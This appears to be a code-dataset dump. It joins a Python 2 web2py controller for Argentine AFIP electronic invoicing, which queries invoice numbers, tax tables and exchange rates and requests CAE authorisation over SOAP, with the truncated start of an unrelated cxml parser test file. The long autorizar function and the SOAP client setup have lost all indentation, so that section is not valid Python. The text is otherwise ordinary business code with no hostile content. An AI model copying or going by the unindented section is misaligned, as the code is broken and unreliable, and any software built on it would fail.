                    "codigoTipoComprobante" : form.vars.tipocbte, \
                    "numeroPuntoVenta" : form.vars.punto_vta})
                # nro = ret.get('numeroComprobante')
                # return nro is not None and str(nro) or 0
            else:
                pass
        except SoapFault,sf:
            # Log the raw exchange and surface the fault to the view.
            db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
            result = {'fault': repr(sf.faultstring),
                      'xml_request': repr(client.xml_request),
                      'xml_response': repr(client.xml_response),
                      }
        except ExpatError, ee:
            # The SOAP reply could not be parsed as XML.
            result = "Error en el Cliente SOAP. Formato de respuesta inválido."
    return {'form': form, 'result': result}
# devuelve último cbte
def f_ultimo_numero_comprobante(comprobante):
    """Query the last AFIP-authorized invoice number (no form).

    Uses the comprobante's type and point of sale; returns a tuple
    (raw web-service result, last number or None).
    """
    valor = None
    result = {}
    try:
        # Dispatch on the active web service; each names the query differently.
        if SERVICE=='wsfe':
            result = client.FERecuperaLastCMPRequest(
                argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
                argTCMP={'PtoVta' : comprobante.punto_vta, 'TipoCbte' : comprobante.tipocbte.cod}
                )['FERecuperaLastCMPRequestResult']
            valor = result["cbte_nro"]
        elif SERVICE=='wsfev1':
            result = client.FECompUltimoAutorizado(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
                PtoVta=comprobante.punto_vta,
                CbteTipo=comprobante.tipocbte.cod,
                )['FECompUltimoAutorizadoResult']
            valor = result["CbteNro"]
        elif SERVICE=='wsfex':
            result = client.FEXGetLast_CMP(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,
                      "Tipo_cbte": comprobante.tipocbte.cod,
                      "Pto_venta": comprobante.punto_vta,}
                )['FEXGetLast_CMPResult']
            valor = result["FEXResult_LastCMP"]["Cbte_nro"]
        elif SERVICE=='wsbfe':
            result = client.BFEGetLast_CMP(
                Auth={"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT,
                      "Tipo_cbte": comprobante.tipocbte.cod,
                      "Pto_venta": comprobante.punto_vta})
            valor = result['BFEGetLast_CMPResult']['BFEResult_LastCMP']['Cbte_nro']
        elif SERVICE=='wsmtxca':
            # inicializar_y_capturar_execepciones
            result = client.consultarUltimoComprobanteAutorizado(\
                authRequest = {"token": TOKEN, "sign": SIGN, "cuitRepresentada": CUIT}, consultaUltimoComprobanteAutorizadoRequest = {\
                "codigoTipoComprobante" : comprobante.tipocbte.cod, \
                "numeroPuntoVenta" : comprobante.punto_vta})
            try:
                if result["arrayErrores"]:
                    for error in result["arrayErrores"]:
                        if str(error["codigoDescripcion"]["codigo"]) == "1502":
                            # Error 1502: no invoices exist yet in AFIP's database.
                            valor = 0
            except KeyError:
                valor = None
            if valor != 0: valor = result["numeroComprobante"]
        else:
            pass
    except SoapFault,sf:
        # Log the raw exchange; valor stays None.
        db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
    except ExpatError, ee:
        # The SOAP reply could not be parsed as XML.
        result = "Error en el Cliente SOAP. Formato de respuesta inválido."
    return (result, valor)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_tributos():
    """Fetch AFIP's reference table of tax (tributo) types via WSFEv1."""
    credentials = {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)}
    respuesta = client.FEParamGetTiposTributos(Auth=credentials)
    return dict(resp = respuesta)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def get_param_dstcuit():
    """Fetch AFIP's reference table of country CUIT numbers via WSFEX."""
    credentials = {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)}
    respuesta = client.FEXGetPARAM_DST_CUIT(Auth=credentials)
    # Expose both the structured response and its repr for debugging.
    return dict(resp = respuesta, dic = repr(respuesta))
def f_get_param_dstcuit(variables):
    """Non-view helper: fetch the country-CUIT reference table (WSFEX)."""
    credentials = {"Token": TOKEN, "Sign": SIGN, "Cuit": long(CUIT)}
    return client.FEXGetPARAM_DST_CUIT(Auth=credentials)
@auth.requires(auth.has_membership('administrador'))
def crear_cuit_paises():
    """Rebuild the local ``dstcuit`` table from AFIP's country-CUIT list.

    On success the table is wiped and repopulated (plus a generic
    "(Sin especificar)" placeholder row); on failure an HTTP 500 is
    raised.  Finally redirects to the setup index page.
    """
    try:
        response = f_get_param_dstcuit(variables)
        # If the parameters were retrieved, delete the old rows and refill.
        if int(response["FEXGetPARAM_DST_CUITResult"]["FEXErr"]["ErrCode"]) == 0:
            db(db.dstcuit.id > 0).delete()
            # Generic placeholder country code accepted by AFIP.
            db.dstcuit.insert(cod="", ds = "(Sin especificar)", cuit = "50000000000")
            for pais in response["FEXGetPARAM_DST_CUITResult"]["FEXResultGet"]:
                db.dstcuit.insert(ds = pais["ClsFEXResponse_DST_cuit"]["DST_Ds"], cuit = pais["ClsFEXResponse_DST_cuit"]["DST_CUIT"])
        else:
            # BUG FIX: the error structure lives under FEXGetPARAM_DST_CUITResult;
            # the original read response["FEXErr"] directly, which always raised
            # KeyError and fell into the generic handler below instead of
            # reporting AFIP's actual error message.
            raise HTTP(500, response["FEXGetPARAM_DST_CUITResult"]["FEXErr"]["ErrMsg"])
    except (TypeError, ValueError, KeyError, AttributeError):
        raise HTTP(500, "Se produjo un error al consultar los registros de AFIP. Se deben configurar previamente las variables de autenticación (Credenciales y CUIT)")
    redirect(URL(r=request, c='setup', f='index'))
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_tipo_expo():
    """Fetch AFIP's reference table of export-type codes (WSFEX).

    Raises HTTP 500 with AFIP's error code and message when the call
    fails; otherwise returns ``dict(tipos=[...])`` with id, description
    and validity range for each export type.
    """
    response = client.FEXGetPARAM_Tipo_Expo(
        auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT})
    if int(response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrCode"]) != 0:
        raise HTTP(500, "Error: " + str(response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrCode"]) + ". " + response["FEXGetPARAM_Tipo_ExpoResult"]["FEXErr"]["ErrMsg"])
    tipos = [] # export types
    for t in response["FEXGetPARAM_Tipo_ExpoResult"]["FEXResultGet"]["ClsFEXResponse_Tex"]:
        tipo = {'id': int(t["Tex_Id"]), 'ds': str(t["Tex_Ds"]).decode('utf8'),
            'vig_desde': str(t["Tex_vig_desde"]),
            'vig_hasta': str(t["Tex_vig_hasta"])}
        tipos.append(tipo)
    return dict(tipos = tipos)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def get_param_zonas():
    # Uses module globals: client, TOKEN, SIGN, CUIT.
    """Fetch AFIP's reference table of zones (WSBFE).

    NOTE(review): the response parsing below is commented out, so the
    raw response is returned as a string and ``zonas`` stays empty.
    """
    response = client.BFEGetPARAM_Zonas(
        auth= {"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT})
    # if int(response.BFEGetPARAM_ZonasResult.BFEErr.ErrCode) != 0:
    #    raise BFEError(response.BFEGetPARAM_ZonasResult.BFEErr)
    zonas = [] # zones (never filled: parsing is disabled below)
    """
    for z in response.BFEGetPARAM_ZonasResult.BFEResultGet.ClsBFEResponse_Zon:
        zon = {'id': int(z.Zon_Id), 'ds': unicode(z.Zon_Ds),
            'vig_desde': str(z.Zon_vig_desde),
            'vig_hasta': str(z.Zon_vig_hasta)}
        zonas.append(zon)
    """
    return dict(zonas = str(response))
# WSMTXCA
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def consultar_monedas():
    """Query the currency codes supported by WSMTXCA.

    Returns ``dict(result=["<code>: <description>", ...])``.
    (The original docstring wrongly described comprobante types.)
    """
    ret = client.consultarMonedas(
        authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
        )
    return dict(result = ["%(codigo)s: %(descripcion)s" % p['codigoDescripcion']
            for p in ret['arrayMonedas']])
# WSMTXCA
def consultar_unidades_medida():
    """Query the units of measurement supported by WSMTXCA.

    Returns ``dict(result=["<code>: <description>", ...])``.
    (The original docstring wrongly described comprobante types.)
    """
    ret = client.consultarUnidadesMedida(
        authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
        )
    return dict(result = ["%(codigo)s: %(descripcion)s" % p['codigoDescripcion']
            for p in ret['arrayUnidadesMedida']])
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('auditor') or auth.has_membership('invitado'))
def cotizacion():
    """View: query AFIP's reference exchange rate for a currency.

    Shows a form (web service + currency code) and, on submit, calls the
    matching rate-lookup method of WSFEX or WSFEv1.
    """
    response.subtitle = "Consulta cotización de referencia"
    form = SQLFORM.factory(
        Field('webservice', type='string', length=6, default='wsfex',
            requires = IS_IN_SET(WEBSERVICES)),
        Field('moneda_id', type='string', default="DOL",
            requires=IS_IN_DB(db,db.moneda.cod,"%(ds)s")),
        )
    result = {}
    if form.accepts(request.vars, session, keepvalues=True):
        # Only WSFEX and WSFEv1 expose an exchange-rate query.
        if SERVICE=='wsfex':
            result = client.FEXGetPARAM_Ctz(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
                Mon_id= form.vars.moneda_id,
                )['FEXGetPARAM_CtzResult']
        elif SERVICE=='wsfev1':
            result = client.FEParamGetCotizacion(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
                MonId=form.vars.moneda_id,
                )['FEParamGetCotizacionResult']
        else:
            pass
    return {'form': form, 'result': result}
@auth.requires(auth.has_membership('emisor') or auth.has_membership('administrador'))
def autorizar():
"Facturador (Solicitud de Autorización de Factura Electrónica AFIP)"
response.subtitle = "Solicitud de Autorización - CAE (%s)" % SERVICE
comprobante = request.args[1]
comprobante = db(db.comprobante.id==comprobante).select().first()
detalles = db(db.detalle.comprobante==comprobante).select()
# cálculo de cbte para autorización
calcular_comprobante(comprobante)
otrostributostmp = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if not (t.tributo.iibb)], 0.00) or 0.00
iibbtmp = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if t.tributo.iibb], 0.00) or 0.00
totaltributostmp = otrostributostmp + iibbtmp
if otrostributostmp == 0: otrostributostmp = None
if totaltributostmp == 0: totaltributostmp = None
# comprobante.imp_op_ex = comprobante_sumar_iva(comprobante)
# comprobante.imp_tot_conc = comprobante_sumar_no_gravado(comprobante)
result = {}
actualizar = {}
# si el cbte no tiene id_ws o nro => consultar último/s
if not comprobante.id_ws:
try:
comprobante.id_ws = int(f_ultimo_id(comprobante)[1]) +1
except (AttributeError, ValueError, KeyError, TypeError):
comprobante.id_ws = None
if not comprobante.cbte_nro:
try:
consulta_cbte = f_ultimo_numero_comprobante(comprobante)
cbte_nro = int(consulta_cbte[1])
comprobante.cbte_nro = cbte_nro +1
except (AttributeError, KeyError, ValueError, TypeError), e:
comprobante.cbte_nro = None
try:
if SERVICE=='wsfe':
result = client.FEAutRequest(
argAuth={'Token': TOKEN, 'Sign': SIGN, 'cuit': CUIT},
Fer={
'Fecr': {'id': long(comprobante.id_ws)+10000, 'cantidadreg': 1,
'presta_serv': comprobante.concepto==1 and '0' or '1'},
'Fedr': {'FEDetalleRequest': {
'tipo_doc': comprobante.tipodoc.cod,
'nro_doc': comprobante.nro_doc.replace("-",""),
'tipo_cbte': comprobante.tipocbte.cod,
'punto_vta': comprobante.punto_vta,
'cbt_desde': comprobante.cbte_nro,
'cbt_hasta': comprobante.cbte_nro,
'imp_total': "%.2f" % comprobante.imp_total,
'imp_tot_conc': comprobante.imp_tot_conc or 0.00,
'imp_neto': "%.2f" % comprobante.imp_neto,
'impto_liq': "%.2f" % comprobante.impto_liq,
'impto_liq_rni': 0.00,
'imp_op_ex': comprobante.imp_op_ex or 0.00,
'fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'fecha_venc_pago': comprobante.fecha_venc_pago and comprobante.fecha_venc_pago.strftime("%Y%m%d"), \
'fecha_serv_desde': comprobante.fecha_serv_desde and comprobante.fecha_serv_desde.strftime("%Y%m%d"), \
'fecha_serv_hasta': comprobante.fecha_serv_hasta and comprobante.fecha_serv_hasta.strftime("%Y%m%d")
}}
}
)['FEAutRequestResult']
if 'resultado' in result.get('FecResp',{}):
# actualizo el registro del comprobante con el resultado:
# intento recuperar fecha de vto.
# para operación aprobada reset de id (local)
if result['FecResp']['resultado'] == "A":
session.comprobante = None
try:
la_fecha_vto = ymd2date(result['FedResp'][0]['FEDetalleResponse']['fecha_vto'])
except ValueError:
la_fecha_vto = None
actualizar = dict(
# Resultado: Aceptado o Rechazado
resultado=result['FecResp']['resultado'],
# Motivo general/del detalle:
motivo=result['FecResp']['motivo'],
reproceso=result['FecResp']['reproceso'],
cae=result['FedResp'][0]['FEDetalleResponse']['cae'],
fecha_vto=la_fecha_vto,
cbte_nro=result['FedResp'][0]['FEDetalleResponse']['cbt_desde'],
id_ws=result['FecResp']['id'],
imp_neto=result['FedResp'][0]['FEDetalleResponse']['imp_neto'],
imp_total=result['FedResp'][0]['FEDetalleResponse']['imp_total'],
impto_liq=result['FedResp'][0]['FEDetalleResponse']['impto_liq'],
impto_liq_rni=result['FedResp'][0]['FEDetalleResponse']['impto_liq_rni'],
imp_op_ex=result['FedResp'][0]['FEDetalleResponse']['imp_op_ex'],
imp_tot_conc=result['FedResp'][0]['FEDetalleResponse']['imp_tot_conc'],
webservice = SERVICE
)
elif result['FecResp']['resultado'] == "R":
session.comprobante = None
actualizar = dict(resultado = "R")
elif SERVICE=='wsfev1':
actualizar = {}
# campos período de servicio: borrar si es tipo 1
if comprobante.concepto == 1:
comprobante.fecha_serv_desde = ""
comprobante.fecha_serv_hasta = ""
comprobante.fecha_venc_pago = ""
if int(comprobante.tipocbte.cod) in [11, 12, 13, 15]:
items_iva = []
else:
items_iva = [{'AlicIva': {
'Id': det["id"],
'BaseImp': "%.2f" % det["base_imp"],
'Importe': "%.2f" % det["importe"],
}}
for det in comprobante_sumar_iva(comprobante)]
result = client.FECAESolicitar(\
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
FeCAEReq={
'FeCabReq': {'CantReg': 1,
'PtoVta': comprobante.punto_vta,
'CbteTipo': comprobante.tipocbte.cod},
'FeDetReq': [{'FECAEDetRequest': {
'Concepto': comprobante.concepto,
'DocTipo': comprobante.tipodoc.cod,
'DocNro': comprobante.nro_doc.replace("-",""),
'CbteDesde': comprobante.cbte_nro,
'CbteHasta': comprobante.cbte_nro,
'CbteFch': comprobante.fecha_cbte.strftime("%Y%m%d"),
'ImpTotal': "%.2f" % comprobante.imp_total,
'ImpTotConc': comprobante.imp_tot_conc or 0.00,
'ImpNeto': "%.2f" % comprobante.imp_neto,
'ImpOpEx': comprobante.imp_op_ex or 0.00,
'ImpTrib': totaltributostmp,
'ImpIVA': "%.2f" % comprobante.impto_liq,
# Fechas solo se informan si Concepto in (2,3)
'FchServDesde': comprobante.fecha_serv_desde and comprobante.fecha_serv_desde.strftime("%Y%m%d"),
'FchServHasta': comprobante.fecha_serv_hasta and comprobante.fecha_serv_hasta.strftime("%Y%m%d"),
'FchVtoPago': comprobante.fecha_venc_pago and comprobante.fecha_venc_pago.strftime("%Y%m%d"),
'MonId': comprobante.moneda_id.cod,
'MonCotiz': comprobante.moneda_ctz,
'CbtesAsoc': [
{'CbteAsoc': {
'Tipo': cbte_asoc.asociado.tipocbte.cod,
'PtoVta': cbte_asoc.asociado.punto_vta,
'Nro': cbte_asoc.asociado.cbte_nro}}
for cbte_asoc in db(db.comprobanteasociado.comprobante == comprobante).select()],
'Tributos': [
{'Tributo': {
'Id': tributo.tributo.cod,
'Desc': unicode(tributo.tributo.ds, "utf-8"),
'BaseImp': moneyornone(tributo.base_imp),
'Alic': tributo.tributo.aliquota,
'Importe': tributo.importe,
}}
for tributo in db(db.detalletributo.comprobante == comprobante).select()],
'Iva': items_iva,
}
}]
})['FECAESolicitarResult']
if 'FeCabResp' in result:
fecabresp = result['FeCabResp']
fedetresp = result['FeDetResp'][0]['FECAEDetResponse']
if fedetresp["Resultado"] == "A":
session.comprobante = None
# aprobado
obstmp = str()
for obs in fedetresp.get('Observaciones', []):
obstmp += "%(Code)s: %(Msg)s. " % obs['Obs']
actualizar = dict(
obs = obstmp,
resultado=fecabresp['Resultado'],
cae=fedetresp['CAE'] and str(fedetresp['CAE']) or "",
fecha_cbte = ymd2date(fedetresp['CbteFch']),
cbte_nro = fedetresp['CbteHasta'],
fecha_vto = ymd2date(fedetresp['CAEFchVto']),
punto_vta = fecabresp['PtoVta'],
webservice = SERVICE
)
else:
# rechazado
actualizar = dict(resultado = "R", cbte_nro = None)
if ('Errors' in result or 'Observaciones' in fedetresp):
""" almacenar el informe de errores u observaciones
y los errores / observaciones """
if 'Errors' in result:
actualizar["err_code"] = ""
actualizar["err_msg"] = ""
for err in result["Errors"]:
actualizar["err_code"] += repr(err["Err"]["Code"]) + ". "
actualizar["err_msg"] += repr(err["Err"]["Msg"]) + ". "
if "Observaciones" in fedetresp:
actualizar["obs"] = ""
for obs in fedetresp["Observaciones"]:
actualizar["obs"] += str(obs["Obs"]["Code"]) + " " + str(obs["Obs"]["Msg"]) + ". "
db.xml.insert(request = client.xml_request, response = client.xml_response)
elif SERVICE=='wsfex':
result = client.FEXAuthorize(Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
Cmp = {\
# str(db.paisdst[comprobante.dst_cmp].cuit).replace("-", "")\
'Id': comprobante.id_ws,
'Fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'Tipo_cbte': comprobante.tipocbte.cod,
'Punto_vta': comprobante.punto_vta,
'Cbte_nro': comprobante.cbte_nro,
'Tipo_expo': comprobante.tipo_expo or 1,
'Permiso_existente': comprobante.permiso_existente,
'Dst_cmp': comprobante.dst_cmp.cod,
'Cliente': unicode(comprobante.nombre_cliente, "utf-8"),
'Cuit_pais_cliente': comprobante.dstcuit.cuit,
'Domicilio_cliente': unicode(comprobante.domicilio_cliente, "utf-8"), # genera excepción Unicode si se usan caracteres no ASCII
'Id_impositivo': comprobante.id_impositivo,
'Moneda_Id': comprobante.moneda_id.cod,
'Moneda_ctz': comprobante.moneda_ctz,
'Obs_comerciales': comprobante.obs_comerciales,
'Imp_total': comprobante.imp_total,
'Obs': comprobante.obs,
'Forma_pago': comprobante.forma_pago,
'Incoterms': comprobante.incoterms,
'Incoterms_ds': comprobante.incoterms_ds,
'Idioma_cbte': comprobante.idioma_cbte,
# listas
'Items': [{ 'Item': {
'Pro_codigo': detalle.codigo, 'Pro_ds': unicode(detalle.ds, "utf-8"), 'Pro_qty': detalle.qty, 'Pro_umed': detalle.umed.cod, 'Pro_precio_uni': detalle.precio,
'Pro_total_item': (detalle.imp_total)
}} for detalle in db(db.detalle.comprobante == comprobante).select()],
'Permisos': [{ 'Permiso': { 'Id_permiso': permiso.id_permiso, 'Dst_merc': permiso.dst_merc.cod
}} for permiso in db(db.permiso.comprobante == comprobante).select()],
'Cmps_asoc': [{ 'Cmp_asoc': {
'Cbte_tipo': comprobanteasociado.asociado.tipocbte.cod, 'Cbte_punto': comprobanteasociado.asociado.punto_vta, 'Cbte_numero': comprobanteasociado.asociado.cbte_nro
}} for comprobanteasociado in db(db.comprobanteasociado.comprobante == comprobante).select()],
})['FEXAuthorizeResult']
if 'FEXResultAuth' in result:
if "Resultado" in result["FEXResultAuth"]:
if result["FEXResultAuth"]["Resultado"] == "A":
session.comprobante = None
# aprobado
actualizar = dict(
obs = result["FEXResultAuth"]["Motivos_Obs"],
resultado=result["FEXResultAuth"]['Resultado'],
cae=result["FEXResultAuth"]["Cae"],
fecha_cbte = ymd2date(result["FEXResultAuth"]["Fch_cbte"]),
cbte_nro = result["FEXResultAuth"]["Cbte_nro"],
fecha_vto = ymd2date(result["FEXResultAuth"]["Fch_venc_Cae"]),
punto_vta = result["FEXResultAuth"]["Punto_vta"],
reproceso = result["FEXResultAuth"]["Reproceso"],
id_ws = result["FEXResultAuth"]["Id"],
webservice = SERVICE
)
else:
# rechazado
actualizar = dict(
obs = result["FEXResultAuth"]["Motivos_Obs"],
resultado=result["FEXResultAuth"]['Resultado'],
id_ws = result["FEXResultAuth"]["Id"],
err_code = result["FEXErr"]["ErrCode"],
err_msg = result["FEXErr"]["ErrMsg"],
webservice = SERVICE
)
session.comprobante = None
if result["FEXErr"]["ErrCode"] or result["FEXResultAuth"]["Motivos_Obs"]:
# almacenar el informe de errores u observaciones
db.xml.insert(request = client.xml_request, response = client.xml_response)
else:
try:
actualizar = dict(err_code = result["FEXErr"]["ErrCode"], err_msg = result["FEXErr"]["ErrMsg"])
except (AttributeError, ValueError, TypeError, KeyError):
actualizar = dict(obs = "Error al procesar la respuesta del web service.")
db.xml.insert(request = client.xml_request, response = client.xml_response)
elif SERVICE=='wsbfe':
result = client.BFEAuthorize(\
Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': long(CUIT)},
Cmp={'Id': comprobante.id_ws,
'Tipo_doc': comprobante.tipodoc.cod,
'Nro_doc': str(comprobante.nro_doc).replace("-", ""),
'Zona': 1,
'Tipo_cbte': comprobante.tipocbte.cod,
'Fecha_cbte': comprobante.fecha_cbte.strftime("%Y%m%d"),
'Punto_vta': comprobante.punto_vta,
'Cbte_nro': comprobante.cbte_nro,
'Imp_total': "%.2f" % comprobante.imp_total,
'Imp_tot_conc': comprobante.imp_tot_conc or 0.00,
'Imp_neto': "%.2f" % comprobante.imp_neto,
'Impto_liq': "%.2f" % comprobante.impto_liq,
'Impto_liq_rni': comprobante.impto_liq_rni or 0.00,
'Imp_op_ex': comprobante.imp_op_ex or 0.00,
'Imp_perc': comprobante.impto_perc or 0.00,
'Imp_iibb': iibbtmp or None,
'Imp_perc_mun': sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select() if t.tributo.iibb == False], 0.00) or 0.00,
'Imp_internos': comprobante.imp_internos or 0.00,
'Imp_moneda_Id': comprobante.moneda_id.cod,
'Imp_moneda_ctz': comprobante.moneda_ctz,
'Items': [{'Item': item} for item in detalles_bono_fiscal(comprobante)],
}
)
if int(result["BFEAuthorizeResult"]["BFEErr"]["ErrCode"]) != 0:
# hubo error?
errortmp = result["BFEAuthorizeResult"]["BFEErr"]
actualizar = dict(err_code = unicode(errortmp["ErrCode"]),
err_msg = unicode(errortmp["ErrMsg"]), resultado = "R")
session.comprobante = None
else:
# extraigo la respuesta (auth y eventos)
restmp = result["BFEAuthorizeResult"]["BFEResultAuth"]
actualizar = dict(
id_ws=int(restmp["Id"]),
cae=str(restmp["Cae"]),
fecha_cbte=ymd2date(restmp["Fch_cbte"]),
resultado=str(restmp["Resultado"]),
fecha_vto=ymd2date(restmp["Fch_venc_Cae"]),
reproceso=str(restmp["Reproceso"]),
obs=str(restmp["Obs"])
)
session.comprobante = None
elif SERVICE=='wsmtxca':
# campos período de servicio: borrar si es tipo 1
if comprobante.concepto == 1:
comprobante.fecha_serv_desde = None
comprobante.fecha_serv_hasta = None
comprobante.fecha_venc_pago = None
fact = {
'codigoTipoDocumento': comprobante.tipodoc.cod,
'numeroDocumento':comprobante.nro_doc.replace("-", ""),
'codigoTipoComprobante': comprobante.tipocbte.cod,
'numeroPuntoVenta': comprobante.punto_vta,
'numeroComprobante': comprobante.cbte_nro,
'importeTotal': moneyornone(comprobante.imp_total),
'importeNoGravado': moneyornone(comprobante.imp_tot_conc),
'importeGravado': moneyornone(comprobante.imp_neto),
'importeSubtotal': moneyornone(float(comprobante.imp_neto) + float(comprobante.imp_op_ex) + float(comprobante.imp_tot_conc)), # 'imp_iva': imp_iva,
'importeOtrosTributos': moneyornone(comprobante.imp_trib),
'importeExento': moneyornone(comprobante.imp_op_ex),
'fechaEmision': date2y_m_d(comprobante.fecha_cbte) or None,
'codigoMoneda': comprobante.moneda_id.cod,
'cotizacionMoneda': comprobante.moneda_ctz,
'codigoConcepto': comprobante.concepto,
'observaciones': comprobante.obs_comerciales,
'fechaVencimientoPago': date2y_m_d(comprobante.fecha_venc_pago) or None,
'fechaServicioDesde': date2y_m_d(comprobante.fecha_serv_desde) or None,
'fechaServicioHasta': date2y_m_d(comprobante.fecha_serv_hasta) or None,
'arrayComprobantesAsociados': [{'comprobanteAsociado': {
'codigoTipoComprobante': cbte_asoc.asociado.tipocbte.cod,
'numeroPuntoVenta': cbte_asoc.asociado.punto_vta,
'numeroComprobante': cbte_asoc.asociado.cbte_nro }} for cbte_asoc in db(db.comprobanteasociado.comprobante == comprobante).select()],
'arrayOtrosTributos': [ {'otroTributo': {
'codigo': tributo.tributo.cod,
'descripcion': unicode(tributo.tributo.ds, "utf-8"),
'baseImponible': moneyornone(tributo.base_imp),
'importe': moneyornone(tributo.importe)}} for tributo in db(db.detalletributo.comprobante == comprobante).select()],
'arraySubtotalesIVA': [{'subtotalIVA': {
'codigo': iva["id"],
'importe': moneyornone(iva["importe"]),
}} for iva in comprobante_sumar_iva(comprobante)],
'arrayItems': [{'item':{
'unidadesMtx': it.umed.cod,
'codigoMtx': it.codigomtx or "0000000000000",
'codigo': it.codigo,
'descripcion': unicode(it.ds, "utf-8"),
'cantidad': it.qty,
'codigoUnidadMedida': it.umed.cod,
'precioUnitario': it.precio,
'importeBonificacion': moneyornone(it.bonif),
'codigoCondicionIVA': it.iva.cod,
'importeIVA': moneyornone(it.imp_iva),
'importeItem': moneyornone(it.imp_total)}} for it in db(db.detalle.comprobante == comprobante).select()]
}
result = client.autorizarComprobante(
authRequest={'token': TOKEN, 'sign': SIGN, 'cuitRepresentada': CUIT},
comprobanteCAERequest = fact,
)
resultado = result['resultado'] # u'A'
actualizar = {"obs": ""}
# actualizar = dict()
obs = []
if result['resultado'] in ("A", "O"):
cbteresp = result['comprobanteResponse']
fecha_cbte = cbteresp['fechaEmision'],
fecha_vto = cbteresp['fechaVencimientoCAE'],
actualizar["cae"] = cbteresp['CAE'], # 60423794871430L,
if resultado == u"A":
session.comprobante = None
else:
response.flash = "El cbte tiene observaciones"
session.comprobante = None
elif result['resultado'] == "R":
session.comprobante = None
for error in result["arrayErrores"]:
obs.append("%(codigo)s: %(descripcion)s" % (error['codigoDescripcion']))
for error in result.get('arrayObservaciones', []):
obs.append("%(codigo)s: %(descripcion)s. " % (error['codigoDescripcion']))
for error in obs:
actualizar["obs"] += error
actualizar["resultado"] = result['resultado']
else:
pass
except SoapFault,sf:
db.xml.insert(request = client.xml_request, response = client.xml_response)
return dict( resultado = {'fault': sf.faultstring}, pdf = None)
except ExpatError, ee:
return dict(resultado = "Error en el Cliente SOAP. Formato de respuesta inválido.", pdf = None)
except (AttributeError, ValueError, TypeError, KeyError), ee:
raise
db.xml.insert(request = client.xml_request, response = client.xml_response)
return dict(resultado = {"fault": "Se produjo un error al procesar los datos del comprobante o los datos enviados son insuficientes. %s" % str(ee)}, pdf = None)
# actualizo el registro del comprobante con el resultado:
if actualizar:
cbttmp = comprobante.as_dict()
for k, v in actualizar.iteritems(): cbttmp[k] = v
db(db.comprobante.id==comprobante).update(**cbttmp)
return dict(resultado = result, pdf = A('Guardar el comprobante en formato PDF', _href=URL(r = request, c="salida", f="guardar_comprobante", args=[comprobante.id,])))
if SERVICE:
try:
# solicito autenticación
if request.controller!="dummy":
TOKEN, SIGN = _autenticar(SERVICE)
# conecto al webservice
if SERVICE == "wsmtxca":
client = SoapClient(
wsdl = WSDL[SERVICE],
cache = PRIVATE_PATH,
ns = "ser",
trace = False,
# voidstr = True # comentar esta línea para pysimplesoap sin modificar
)
else:
client = SoapClient(
wsdl = WSDL[SERVICE],
cache = PRIVATE_PATH,
trace = False,
# voidstr = True # comentar esta línea para pysimplesoap sin modificar
)
except HTTPError, e:
session.mensaje = "Error al solicitar el ticket de acceso: %s" % str(e)
redirect(URL(c="default", f="mensaje"))
| agpl-3.0 |
python-openxml/cxml | tests/test_parser.py | 2 | 8632 | # encoding: utf-8
"""
Test suite for cxml parser module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import sys
sys.path.insert(0, '.')
import pytest
from cxml.lexer import CxmlLexer
from cxml.parser import CxmlParser
from cxml.symbols import (
COLON, COMMA, SNTL, EQUAL, LBRACE, LPAREN, NAME, RBRACE, RPAREN, SLASH,
TEXT, attr, attr_list, attrs, element, nsdecl, qname, root, root_element,
str_attr, tree, tree_list, trees
)
class DescribeParser(object):
    """Behavior spec for ``CxmlParser``.

    Each ``it_can_parse_*`` method feeds one fixture-supplied CXML snippet to
    ``parse()`` with a given start symbol and checks, via ``shallow_eq``, that
    the resulting AST's root symbol and immediate children match expectations.
    Every fixture yields ``(input string, expected root symbol, expected
    [(child symbol, child value), ...])`` tuples, one test run per param.
    """
    def it_can_parse_an_nsdecl(self, nsdecl_fixture):
        input_, root_symbol, expected_values = nsdecl_fixture
        ast = parse(input_, nsdecl)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_qname(self, qname_fixture):
        input_, root_symbol, expected_values = qname_fixture
        ast = parse(input_, qname)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_a_string_attribute(self, str_attr_fixture):
        input_, root_symbol, expected_values = str_attr_fixture
        ast = parse(input_, str_attr)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_an_attr(self, attr_fixture):
        input_, root_symbol, expected_values = attr_fixture
        ast = parse(input_, attr)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_an_attr_list(self, attr_list_fixture):
        input_, root_symbol, expected_values = attr_list_fixture
        ast = parse(input_, attr_list)
        assert shallow_eq(ast, root_symbol, expected_values)
    def it_can_parse_an_attrs(self, attrs_fixture):
